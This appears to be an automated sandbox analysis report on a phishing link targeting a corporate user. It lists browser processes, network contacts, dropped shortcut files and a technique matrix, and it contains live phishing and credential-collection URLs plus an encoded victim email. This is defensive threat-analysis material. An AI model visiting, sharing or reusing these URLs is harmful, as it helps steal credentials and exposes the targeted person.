Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: classification engineClassification label: mal68.phis.win@19/35@28/12
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2540,i,10552630930107338584,18205451540120361499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2540,i,10552630930107338584,18205451540120361499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=0%VirustotalBrowse
http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://gbmaucstans.com/favicon.ico1%VirustotalBrowse
http://gbmaucstans.com/main/main.php0%VirustotalBrowse
http://gbmaucstans.com/main/src.js0%VirustotalBrowse
https://bc1qhefefhkqg4a9rhm372pr0wj.com/api/v3/auth5%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
cubes.concordia.ca
132.205.186.10
truefalse
    high
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      unknown
      ooc-g2.tm-4.office.com
      52.96.165.50
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.17.3.184
          truefalse
            high
            federation.cgi.com
            85.119.134.168
            truefalse
              high
              www.google.com
              64.233.177.147
              truefalse
                high
                gbmaucstans.com
                198.98.54.45
                truefalse
                  unknown
                  fp2e7a.wpc.phicdn.net
                  192.229.211.108
                  truefalse
                    unknown
                    LYH-efz.ms-acdc.office.com
                    52.96.122.2
                    truefalse
                      high
                      bc1qhefefhkqg4a9rhm372pr0wj.com
                      185.216.70.4
                      truefalse
                        unknown
                        outlook.office.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.jsfalse
                            high
                            https://federation.cgi.com/adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AADfalse
                              high
                              http://gbmaucstans.com/main/false
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                  high
                                  https://challenges.cloudflare.com/turnstile/v0/b/bcc5fb0a8815/api.js?onload=onloadTurnstileCallbackfalse
                                    high
                                    https://federation.cgi.com/adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3false
                                      high
                                      http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=false
                                        unknown
                                        http://gbmaucstans.com/main/main.phpfalseunknown
                                        https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                          high
                                          http://gbmaucstans.com/favicon.icofalseunknown
                                          https://outlook.office.com/mail/favicon.icofalse
                                            high
                                            http://gbmaucstans.com/main/src.jsfalseunknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8753fe19daf9b0e5false
                                              high
                                              https://bc1qhefefhkqg4a9rhm372pr0wj.com/api/v3/authfalseunknown
                                              https://federation.cgi.com/adfs/portal/css/style.cssfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792false
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bffalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.17.24.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      52.96.122.2
                                                      LYH-efz.ms-acdc.office.comUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      185.216.70.4
                                                      bc1qhefefhkqg4a9rhm372pr0wj.comGermany
                                                      43659CLOUDCOMPUTINGDEfalse
                                                      104.17.3.184
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      85.119.134.168
                                                      federation.cgi.comSweden
                                                      29217WM-DATASEfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      198.98.54.45
                                                      gbmaucstans.comUnited States
                                                      53667PONYNETUSfalse
                                                      64.233.177.147
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      52.96.165.50
                                                      ooc-g2.tm-4.office.comUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      104.17.2.184
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      132.205.186.10
                                                      cubes.concordia.caCanada
                                                      376RISQ-ASCAfalse
                                                      IP
                                                      192.168.2.5
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1426704
                                                      Start date and time:2024-04-16 13:55:35 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 41s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal68.phis.win@19/35@28/12
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.9.94, 64.233.176.84, 142.251.15.102, 142.251.15.139, 142.251.15.101, 142.251.15.138, 142.251.15.113, 142.251.15.100, 34.104.35.123, 40.127.169.103, 199.232.210.172, 192.229.211.108, 23.40.205.74, 23.40.205.26, 23.40.205.49, 52.165.164.15, 13.95.31.18, 142.251.15.95, 64.233.185.95, 142.250.105.95, 74.125.138.95, 142.250.9.95, 173.194.219.95, 172.253.124.95, 74.125.136.95, 64.233.176.95, 108.177.122.95, 64.233.177.95, 172.217.215.95, 23.40.205.18, 23.40.205.75, 23.40.205.83, 23.40.205.56, 74.125.138.94, 72.21.81.240
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 10:56:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):3.9787912003084487
                                                      Encrypted:false
                                                      SSDEEP:48:8Xd2dQTUIIHZcidAKZdA19ehwiZUklqehKlxy+3:8XdN/prxy
                                                      MD5:B4A7D30AC206B0FAEDDE333930760E10
                                                      SHA1:5B48E8B4D3CF2D87E65963F83CF5FF3477434B11
                                                      SHA-256:5041C9A0FA6917C4B0A04392CAFCB1419A8B845B34D7FCC72AF51C7D324EA60E
                                                      SHA-512:468FBA48623B6C888C95FB06633FFD5D2FEA5D5FEA283F28909ED755105EDE8C35397ABF94F0A12B36C0297831073E4193465CBD4A55CD2A27EC8B526E05C39F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....T.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X._...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 10:56:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.993787245856128
                                                      Encrypted:false
                                                      SSDEEP:48:8Bd2dQTUIIHZcidAKZdA1weh/iZUkAQkqehZlxy+2:8BdN/79Q4xy
                                                      MD5:0042C3953852DD427EA906764BC62F94
                                                      SHA1:FF9185151E4941250CED600B1295FCB54D0F47C1
                                                      SHA-256:310F6E9113893ECA21F8D10A466A24BA50D334B280FFA64ABCDC7550652135FC
                                                      SHA-512:445CAE3C9FCEC1DDCAB81C07F8CF692519FD5A941269F842B9C0134321DFBDB6995A65EA7E708792BA5FD37E918FCB641F88D65A63AFA297BA23A362C9D6645E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X._...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2693
                                                      Entropy (8bit):4.005181604586301
                                                      Encrypted:false
                                                      SSDEEP:48:8x02dQTUIsHZcidAKZdA14tseh7sFiZUkmgqeh7sPlxy+BX:8x0N/3nfxy
                                                      MD5:7ADCFE8A4D750D1007D1DB7C2BD1E119
                                                      SHA1:70433B1E287597389ECC57D8974A230A0090879B
                                                      SHA-256:C633009B55DA5410EB138B8DA169EFEF9434208E045168E419C1CDBEB01D1986
                                                      SHA-512:751E83BE3E230D99ADE1F7A631E7443917DC05058002ED472A68624396A9A6DC93ABEA70BBBA2B791745C5F954411ED8CB0FA1C07B451109C4351594E79899C4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 10:56:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.9929914863046956
                                                      Encrypted:false
                                                      SSDEEP:48:8vd2dQTUIIHZcidAKZdA1vehDiZUkwqehNlxy+R:8vdN/YVxy
                                                      MD5:7BC9D9AC679E667D55C2BDBB30177EAE
                                                      SHA1:4DAD29DFD286B2A1227BD7949CF8FF8CB3F591CC
                                                      SHA-256:C1F36FA6A0AE93A7F882E926BB8175B8FD301680A53AB4DE202C071E360CB4EE
                                                      SHA-512:A61641E677B0594BC6FDBE9EC5DCA4C255C1FD4EC7396057AD9CD520B0307CD1467E2D130E78829F88AC0A68C38634AEF0B70595B2A665147FD105E8A20F8211
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X._...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 10:56:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.9822614388542967
                                                      Encrypted:false
                                                      SSDEEP:48:8Wd2dQTUIIHZcidAKZdA1hehBiZUk1W1qehblxy+C:8WdN/I9hxy
                                                      MD5:A9697BF793EB3E8731574D132BDCF33C
                                                      SHA1:8BEF1588443A78976B59721A357C919B702EE95B
                                                      SHA-256:5627718CB308D6B1F6B2065FF37D97717B4789BAB5E12CF535A4DD114A00E778
                                                      SHA-512:4721537B1C1C2CD53BC8039D66869A97539D86D5DDBFD35888AA510C7963141A05139F6C9540B4990D045DB9E24B2376B54EBA80B2A5CD1412992623E5CB8AA7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....8M......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X._....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X._....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X._....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X._..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X._...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
